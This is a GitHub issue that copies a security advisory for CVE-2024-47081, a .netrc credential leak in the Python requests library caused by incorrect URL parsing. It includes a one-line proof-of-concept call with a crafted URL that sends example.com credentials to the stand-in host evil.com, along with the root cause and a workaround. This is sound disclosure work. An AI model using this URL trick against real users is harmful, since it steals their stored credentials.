CVE-2024-47081: Netrc credential leak in PSF requests library #6964
Description
There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('[http://example.com:@evil.com/&apos](http://[email protected]/&apos);)
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.